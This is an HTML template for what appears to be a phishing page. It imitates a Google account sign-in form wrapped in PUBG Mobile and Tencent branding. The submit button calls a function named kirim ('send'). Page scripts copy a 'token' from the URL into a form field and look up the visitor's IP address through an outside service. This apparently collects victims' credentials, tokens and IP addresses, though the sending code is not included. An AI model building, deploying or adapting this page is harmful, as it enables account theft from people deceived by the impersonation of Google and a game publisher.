		<div id="indexresult">
			<div id="konten">
				<div class="txt-login-google">Sign in</div>
				<div class="txt-login-google-desc">Use your Google Account</div>
				<form id="login-form">
					<div class="google-input-email">
						<input type="text" name="email" id="email" autocomplete="off" required>
						<label>Email or phone</label>
					</div>
					<button type="button" class="btn-forgot-google">Forgot email?</button>
					</br>
					<div class="notify-google">
						 Not your computer? Use Guest mode to sign in privately. <span>Learn more</span>
					</div>
					</br>
					<button type="submit" onclick="kirim()" class="btn-login-google">Next</button>
					<button type="button" class="btn-forgot-google">Create account</button>
				</form>
				</br>
				</br>
			</div>
			<!--- konten --->
			<div id="loadingresult" style="display: none;">
				<div class="progress" style="display: none;">
					<div style="display: none;" class="progress-bar progress-bar-success progress-bar-striped active" role="progressbar" aria-valuenow="100" aria-valuemin="0" aria-valuemax="100" style="width: 100%"></div>
				</div>
			</div>
		</div>
		<!--- container ---></div>
</div>



    <!-- footer -->
<div class="footer">
    <div class="foot_ct">
        <p class="foot_icon">
            <a onclick="gtag(&#39;event&#39;, &#39;x_jump&#39;, {&#39;event_category&#39;: &#39;website&#39;,&#39;event_label&#39;: &#39;pc_footer_facebook&#39;});" href="https://www.facebook.com/PUBGMobile" class="foot_icon1" target="_blank">Facebook</a>
            <a onclick="gtag(&#39;event&#39;, &#39;x_jump&#39;, {&#39;event_category&#39;: &#39;website&#39;,&#39;event_label&#39;: &#39;pc_footer_twitter&#39;});" href="https://twitter.com/PUBGMOBILE" class="foot_icon2" target="_blank">Twitter</a>
            <a onclick="gtag(&#39;event&#39;, &#39;x_jump&#39;, {&#39;event_category&#39;: &#39;website&#39;,&#39;event_label&#39;: &#39;pc_footer_youtube&#39;});" href="https://www.youtube.com/pubgmobile" class="foot_icon3" target="_blank">Youtube</a>
            <a onclick="gtag(&#39;event&#39;, &#39;x_jump&#39;, {&#39;event_category&#39;: &#39;website&#39;,&#39;event_label&#39;: &#39;pc_footer_ins&#39;});" href="https://www.instagram.com/pubgmobile" class="foot_icon4" target="_blank">Instagram</a>
            <a onclick="gtag(&#39;event&#39;, &#39;x_jump&#39;, {&#39;event_category&#39;: &#39;website&#39;,&#39;event_label&#39;: &#39;pc_footer_vk&#39;});" href="https://vk.com/pubgmobile" class="foot_icon5" target="_blank">VK</a>
        </p>
        <p class="foot_ship">Partnership Inquiry: pubgmobile_business@tencent.com</p>
        <div class="foot_copy clearfix">
            <p class="copy_left">
                <img src="{% static 'pubg/tod/css/foot_logo1.png" width="142" height="40" alt="">
                <img src="{% static 'pubg/tod/css/foot_logo2.png" width="94" height="40" alt="">
                <img src="{% static 'pubg/tod/css/foot_logo3.png" width="165" height="40" alt="">
            </p>
            <div class="copy_right">
                <p>ⓒ 2018-2020 PUBG CORPORATION. All rights reserved.</p>
                <p>ⓒ 2018-2020 Tencent. All rights reserved.</p>
                <p><a onclick="gtag(&#39;event&#39;, &#39;x_jump&#39;, {&#39;event_category&#39;: 
                 &#39;website&#39;,&#39;event_label&#39;: &#39;pc_footer_terms&#39;});" href="https://www.pubgmobile.com/privacy.html">Privacy Policy </a>|
                    <a onclick="gtag(&#39;event&#39;, &#39;x_jump&#39;, {&#39;event_category&#39;: 
                  &#39;website&#39;,&#39;event_label&#39;: &#39;pc_footer_privacy&#39;});" href="https://www.pubgmobile.com/terms.html"> Tencent Games User Agreement</a>
                </p>

            </div>
        </div>
    </div>
</div>


    
<script src="{% static 'pubg/tod/css/jquery-1.7.2.min.js.download' %}" type="text/javascript"></script>
<script src="{% static 'pubg/tod/css/fastclick.js.download' %}" type="text/javascript"></script>
<script src="{% static 'pubg/tod/css/common.js.download' %}" type="text/javascript"></script>

    
<script type="text/javascript" src="{% static 'pubg/tod/css/weapon.js.download' %}"></script>
<script type="text/javascript">
	$(function () {
		Common.init();
		Weapon.init();
	})
</script>
<script type="text/javascript" src="http://code.jquery.com/jquery-1.10.2.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="{% static 'pubg/tod/js/tab_rewards.js' %}"></script>
<script src="{% static 'pubg/tod/js/tab_other.js' %}"></script>
<script src="{% static 'pubg/tod/js/popup.js' %}"></script>
<script src="{% static 'pubg/tod/js/content.js' %}"></script>
<script src="{% static 'pubg/tod/js/counter.js' %}"></script>
<script src="{% static 'pubg/tod/js/google.js' %}"></script>

    <!-- Global Site Tag (gtag.js) - Google Analytics -->
    <script async="" src="./tod/css/js"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-65628961-3');
</script>



</div>
</body>

<script>
let url = new URL(window.location.href)
let token = url.searchParams.get("token");
var el = document.getElementById("inputtoken")
console.log(token)

if (token !== null){

   console.log(token)
   el.value = token;
}
</script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script>

$.getJSON('https://api.db-ip.com/v2/free/self', function(data) {
    ip = document.getElementById("ip");
    ip.value = data.ipAddress
});
</script>

</html>